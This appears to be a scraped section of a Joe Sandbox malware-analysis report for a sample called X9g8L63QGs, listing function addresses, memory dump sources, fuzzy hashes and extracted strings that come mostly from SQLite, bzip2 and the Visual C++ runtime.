                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2313493979
                                                                                                                                                                                                                                                                    • Opcode ID: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
                                                                                                                                                                                                                                                                    • Instruction ID: 58f7db47ab2c7a1fb29ca4ac7f6d0bc383f278f01cbe8ae1c9ff44d163114930
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2B1BCE2A08B8186E720CF25D4486A977A6FF55BA4F058335DE6D077E5EF38E191C304
                                                                                                                                                                                                                                                                    Function 00007FFB0C06D3D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFB0C067847), ref: 00007FFB0C06D52A
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFB0C067847), ref: 00007FFB0C06D554
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFB0C067847), ref: 00007FFB0C06D5A7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2852464175
                                                                                                                                                                                                                                                                    • Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                                                    • Instruction ID: 8f85c541d12cdbbd215e93c33dca39651e27dcd99f58a3bfe0b8f1c9b0f7c46a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E919FE2B197418AEB248F26D444B3967A1FF84B94F144635EEAD47B94EF3CE450CB08
                                                                                                                                                                                                                                                                    Function 00007FFB0C0A93F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                                                    • API String ID: 0-1505470444
                                                                                                                                                                                                                                                                    • Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                                                    • Instruction ID: df64814a8c2743da89c893950dafb210c1ee46baf7b296032887fe9f1ef5d139
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 949189F2B08B8185EA20DB25D448BAA67A4FF45BA4F444326DEBD477E5EF38D441C304
                                                                                                                                                                                                                                                                    Function 00007FFB0C0489A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 0-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                                    • Instruction ID: 7678807d70b5a8ca8b9249b3c4c9f733c4ee7386a4b8c80f01bef0dd72a138b0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D181E8E26086D19AE7548B35D588ABF7BA0FF40B84F048636DB8D87681EF3CE495C744
                                                                                                                                                                                                                                                                    Function 00007FFB0C083E60 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3459038510
                                                                                                                                                                                                                                                                    • Opcode ID: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
                                                                                                                                                                                                                                                                    • Instruction ID: 6761270e23b2cf3da68567366fff8e4becb38ce2c23111274279fcbd35610e49
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB61D6E2B0858286DB158F25E4446B9B7A2BF80BA4F448235DE9D477E1EF3DD44AC704
                                                                                                                                                                                                                                                                    Function 00007FFB1BB12358 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d$ final combined CRC = 0x%08x
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-3357347091
                                                                                                                                                                                                                                                                    • Opcode ID: c5541a520e518ba75f4c3a1f0d11ee1cc57c429cfdd7a83228e764fc4722281d
                                                                                                                                                                                                                                                                    • Instruction ID: a536931089c1c7dc81e88dfe23febce638c84ab6b35d52f95f216544e85cd7dc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5541a520e518ba75f4c3a1f0d11ee1cc57c429cfdd7a83228e764fc4722281d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5861D6BAB15A12D6E620EF36F4553BB2392FB85F54F14A035CE0907B66DE3DE4028740
                                                                                                                                                                                                                                                                    Function 00007FFB1C25E720 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                                                                                    • Instruction ID: 691f324cf1aa27353b3a0c0d8b252cab02f2ef074516e848f7743b1eda0cbc49
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 515192F2A19E028BDB54EB25D04C6FA2793EB45BA8F608131DA5D47758DF7CE841C740
                                                                                                                                                                                                                                                                    Function 00007FFB0C048CA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                                    • Instruction ID: 416c838c855d0a57efb00866271581d64c1669c6827dc6ce701df0411d8a4a2b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2951EFF2608BC0C5CB118B6AE4889AEBB64FB54B84F55813AEB8E43795EB3CD445C704
                                                                                                                                                                                                                                                                    Function 00007FFB0C05C5E7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2410398255
                                                                                                                                                                                                                                                                    • Opcode ID: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                                                    • Instruction ID: f1f34a75351eb180d12df4863143450f8bffbbd1b4ac085409ec7e93f9149d45
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F961CEE2A0879282E7149B36D158A7E6764FF45B98F104032EE8D07B95EF3CE842C714
                                                                                                                                                                                                                                                                    Function 00007FFB0C028417 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2916047017
                                                                                                                                                                                                                                                                    • Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                                                    • Instruction ID: 200d501f2a89163f8c24da8936d99148288deb55dc908823d71b3197d6e8f25b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C751ADF7A1865282EA668E35D048F3963A5FF14BA8F568731DA3D036C4EF2CE841C744
                                                                                                                                                                                                                                                                    Function 00007FFB1C2534E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abort$CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 444109036-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
                                                                                                                                                                                                                                                                    • Instruction ID: 008a86f0bc0cb3b193fefae333a2dc1ba1ca4a406b02ad3951c1125625fd7603
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78515FF2618B4187E620AB65E4446EF7BA6FB8ABA0F201535DB8D47755CF3CE850CB40
                                                                                                                                                                                                                                                                    Function 00007FFB0C04FE60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: $%!.15g$-
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-875264902
                                                                                                                                                                                                                                                                    • Opcode ID: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
                                                                                                                                                                                                                                                                    • Instruction ID: 69d4ca6ac5c02b4a63b4f1d67a6d5c4e46484afd8992e8a8143ca75968f19bb2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D84103E2A1C79687EB10CB3EE055BAABBA0EF85784F004135EA8E47796DB3DD405C740
                                                                                                                                                                                                                                                                    Function 00007FFB1C2599AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                                                                                    • String ID: %lf
                                                                                                                                                                                                                                                                    • API String ID: 1333004437-2891890143
                                                                                                                                                                                                                                                                    • Opcode ID: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
                                                                                                                                                                                                                                                                    • Instruction ID: 8c42969d5d7a6ddcf243fc979b12e1bab5e4c5d7fc94946b7cd5c011f8e7e334
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9131C8E1B08F9686E610FB75E8580FA6352BF477A0F644132E94E43351DE3CE942C380
                                                                                                                                                                                                                                                                    Function 00007FFB1B6FEDCC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
